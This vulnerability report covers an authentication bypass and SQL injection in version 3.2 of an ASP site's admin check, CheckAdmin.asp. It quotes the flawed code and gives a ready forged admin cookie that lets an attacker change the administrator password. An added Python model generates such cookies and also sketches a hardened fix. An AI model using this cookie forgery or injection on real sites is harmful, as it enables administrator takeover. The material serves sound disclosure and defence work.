### Brief description:

A logic error in the code lets an attacker construct a request that bypasses the login check and changes the administrator password directly.

### Detailed description:

In the latest version, 3.2, `admin\CheckAdmin.asp` contains:

```asp
' Every value the check depends on is read back from the client's cookies
username = request.Cookies("username")
password = request.Cookies("password")
cookies_md5 = request.Cookies("cookies_md5")
dim admin_name,admin_pass,admin_qx,admin_aqx
set rs = server.createobject("adodb.recordset")
' username is concatenated straight into the query: SQL injection
sql="select * from shuaiweb_vipadministrator where username='"&username&"'"
rs.open sql,dbok,1,1
admin_name = rs("username")
admin_pass = rs("password")
admin_qx = rs("wait_ader")
admin_aqx = rs("wait_adyi")
rs.Close
set rs=nothing
response.write sql
' The expected token is recomputed from the cookie values themselves;
' admin_pass (the stored password) is never compared against anything
if cookies_md5 <> left(MD5(username&password),10) then
    response.write "登录超时,请重新登录!"
    response.cookies("username") = ""
    response.cookies("password") = ""
    response.end
end if
```

`username` goes into the SQL without any filtering, which already counts as an injection...

The following block

```asp
if cookies_md5 <> left(MD5(username&password),10) then
....
end if
```

can be bypassed with a constructed cookie:

Cookie: username=admin; password=aaaaa; cookies_md5=84d8e258de

![QQ截图20140704020649.png](https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png)

![QQ截图20140704021043.png](https://images.seebug.org/upload/201407/040211091bef5181fa73945cd205d4ed3f531044.png)

After submitting the new password I still had to modify the cookie for the submission to succeed; is the password perhaps only modifiable in a file...
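As an added Python model (not the page's ASP code) of why this check is bypassable and what a server-bound token looks like: the original check is replayed against the report's cookie triple, then a hardened variant binds the token to a server secret and the stored password hash and looks the account up with a parameterised query. It assumes a `SERVER_SECRET` kept on the server, an in-memory sqlite table shaped like `shuaiweb_vipadministrator`, and SHA-256 as a stand-in for the stored password hash.

```python
import hashlib
import hmac
import sqlite3

# Assumption: a secret that lives only on the server, never in a cookie
SERVER_SECRET = b"constructed-server-side-secret"


def original_check(cookies):
    """Model of CheckAdmin.asp: the expected token is derived only from values
    the client itself supplied, so any self-consistent triple passes."""
    username = cookies.get("username", "")
    password = cookies.get("password", "")
    expected = hashlib.md5((username + password).encode()).hexdigest()[:10]
    return cookies.get("cookies_md5") == expected


def self_consistent_cookie(username="admin", password="aaaaa"):
    """The cookie triple from the report: token computed purely from the cookie."""
    token = hashlib.md5((username + password).encode()).hexdigest()[:10]
    return {"username": username, "password": password, "cookies_md5": token}


def make_token(username, stored_pw_hash):
    """Server-issued session token: keyed HMAC over the account and its stored
    password hash, so it cannot be recomputed without SERVER_SECRET."""
    msg = f"{username}\0{stored_pw_hash}".encode()
    return hmac.new(SERVER_SECRET, msg, "sha256").hexdigest()


def hardened_check(cookies, db):
    """Parameterised lookup plus constant-time comparison against a server token."""
    username = cookies.get("username", "")
    row = db.execute(
        "select password from shuaiweb_vipadministrator where username = ?",
        (username,),
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(cookies.get("cookies_md5", ""), make_token(username, row[0]))


def build_db():
    """Constructed in-memory table mirroring the report's admin table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table shuaiweb_vipadministrator (username text, password text)")
    stored = hashlib.sha256(b"constructed-real-admin-password").hexdigest()
    db.execute("insert into shuaiweb_vipadministrator values (?, ?)", ("admin", stored))
    return db, stored
```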
![QQ截图20140704022237.png](https://images.seebug.org/upload/201407/04022250a86944dbbc71b8e5e52d7cc56cf66b72.png)

### Proof of vulnerability:

![QQ截图20140704020649.png](https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png)

![QQ截图20140704021043.png](https://images.seebug.org/upload/201407/040211091bef5181fa73945cd205d4ed3f531044.png)

![QQ截图20140704022237.png](https://images.seebug.org/upload/201407/04022250a86944dbbc71b8e5e52d7cc56cf66b72.png)